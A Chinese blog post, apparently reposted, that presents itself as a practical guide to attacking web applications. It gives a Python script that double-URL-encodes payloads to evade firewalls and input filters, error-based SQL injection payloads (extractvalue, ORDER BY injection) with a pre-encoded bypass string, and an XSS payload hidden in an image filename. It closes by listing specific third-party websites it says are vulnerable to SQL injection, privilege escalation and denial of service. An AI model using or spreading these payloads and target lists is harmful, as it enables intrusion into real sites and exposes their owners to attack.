当前位置:   article > 正文

Web应用攻击的方法及实践经验

Web应用攻击的方法及实践经验

此文章会持续更新,我会发一些已经存在漏洞的网站实例在上边,以便于大家更好直观如何进行Web攻击

本文章的所提到的网站漏洞只是本人猜想,并没有证实,如果发现有雷同的网站漏洞和纯属巧合。

发布网站安全类的网站

第一步:关注漏洞网站
【国家信息安全漏洞共享平台】
https://www.cnvd.org.cn/
CVE
https://cve.mitre.org/
【漏洞盒子】斗象科技
https://planet.vulbox.com/detail/MTIxODE=
【山西鑫鼎宸科技股份有限公司】
http://www.sxxdckj.com/cms/c/qita.html?page=2
【360补天平台】
https://www.butian.net/Reward/plan/1

第二步:熟悉扫描工具
例如:
HCL AppScan Standard 【常见的扫描工具】
sqlmap_GUI【进阶版SQl注入工具】
python代码编写【手搓核弹,手动编写代码攻击】

第三步:了解各种防御手段,例如拦截XSS攻击和SQl注入,一般的代码是屏蔽特殊字段和url转译

利用python编写一段代码绕开防火墙和代码拦截

	import string
payload=";p";
retVal = payload
if payload:
    retVal = ""
    i = 0
 
    while i < len(payload):
        if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
            retVal += '%%25%s' % payload[i + 1:i + 3]
            i += 3
        else:
            retVal += '%%25%.2X' % ord(payload[i])
            i += 1
 
print (retVal)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

上传这一段是写了一个url2次编码,可以绕过防火墙XSS/SQL等特殊字节
被直接屏蔽掉

SQL数据注入

1.通过检索框注入

mysql 数据库在搜索框中输入:

 1' and extractvalue(
  • 1

会有暴库的效果,但由于防火墙和代码不让你输入特殊字符和关键词,这时候就可以进行url转码变成

1%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528
  • 1

这样会绕开防火墙的检测。

2.通过ORDER BY 注入

select * from users order by 字段 ASC ;
  • 1

字段变成 一下语句利用mysql 函数,进行暴库

extractvalue(1,(select concat(0x7e,user())))
  • 1

3.通过上传图片xss攻击

将一张图片名改为,即可实现xss攻击 
&lt;img src=x οnerrοr='prompt(1)'&gt;aaaa.jpg
  • 1
  • 2

已经发现漏洞的网站

已经证实有网站安全问题,如有疑问可以在底下留言评论查看详细漏洞
  • 1

sql回显

  1. http://www.sanfengruike.com
  2. http://whdkkj.com
  3. https://www.0735.org.cn
  4. http://www.km.cn

用户越权

  1. http://www.gzyxlib.cn/

SQL注入

  1. http://www.hailuozy.com/index.html
  2. http://qiantucc.com/index.html
  3. http://ys.zeiot.cn/xmxz2.aspx

DOS攻击

http://cmp.tcl.com:82/Frame/Login.htm

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/352875
推荐阅读
相关标签
  

闽ICP备14008679号